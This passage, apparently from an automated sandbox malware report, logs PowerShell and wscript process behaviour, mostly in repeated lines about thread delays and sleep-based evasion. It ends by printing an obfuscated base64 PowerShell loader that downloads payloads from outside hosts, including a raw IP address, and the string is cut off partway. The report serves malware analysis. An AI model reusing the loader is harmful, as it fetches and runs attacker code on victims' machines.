Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1184Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1826Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3993Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5278Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2100Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1545Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep count: 3993 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep count: 5278 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep count: 2100 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4232Thread sleep count: 1545 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000003.2078892658.000001680CCE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079326382.000001680CC91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079060783.000001680CC90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079511227.000001680CC91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080298338.000001680CCE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080219916.000001680CC91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079117086.000001680CCE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
